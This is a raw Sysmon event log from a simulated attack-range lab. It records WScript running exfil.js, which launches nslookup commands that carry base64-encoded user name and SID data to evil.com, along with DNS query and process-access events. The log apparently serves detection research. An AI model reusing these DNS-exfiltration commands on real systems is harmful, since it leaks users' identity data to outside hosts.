(rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-003E-000000005F02}300C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlojds.tmp 2>&1 10341000x8000000000000000194850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.521{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-013E-000000005F02}4740C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.521{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-013E-000000005F02}4740C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.521{2E1864BB-17A8-629A-013E-000000005F02}47406216C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-003E-000000005F02}300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.505{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-013E-000000005F02}4740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.505{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.503{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.503{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.502{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-003E-000000005F02}300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.501{2E1864BB-17A1-629A-783D-000000005F02}55526036C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-003E-000000005F02}300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.501{2E1864BB-17A8-629A-003E-000000005F02}300C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlojds.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000194839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.514{00000000-0000-0000-0000-000000000000}7380evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.448{00000000-0000-0000-0000-000000000000}408evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.379{00000000-0000-0000-0000-000000000000}7632evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.295{00000000-0000-0000-0000-000000000000}3460evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.144{00000000-0000-0000-0000-000000000000}2036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.039{00000000-0000-0000-0000-000000000000}5736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.921{00000000-0000-0000-0000-000000000000}2952evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.824{00000000-0000-0000-0000-000000000000}6716evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.719{00000000-0000-0000-0000-000000000000}4864evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.621{00000000-0000-0000-0000-000000000000}4796evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.530{00000000-0000-0000-0000-000000000000}7592evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.447{00000000-0000-0000-0000-000000000000}5896evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000194827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.483{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldxnc.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.452{2E1864BB-17A8-629A-FE3D-000000005F02}47084060C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-FF3D-000000005F02}3848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.437{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.437{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.437{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-FF3D-000000005F02}3848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.437{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.437{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.437{2E1864BB-17A8-629A-FD3D-000000005F02}72324768C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-FF3D-000000005F02}3848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.450{2E1864BB-17A8-629A-FF3D-000000005F02}3848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-FD3D-000000005F02}7232C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldxnc.tmp 2>&1 10341000x8000000000000000194818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.405{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-FE3D-000000005F02}4708C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.405{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-FE3D-000000005F02}4708C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.405{2E1864BB-17A8-629A-FE3D-000000005F02}47084060C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-FD3D-000000005F02}7232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.401{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-FE3D-000000005F02}4708C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 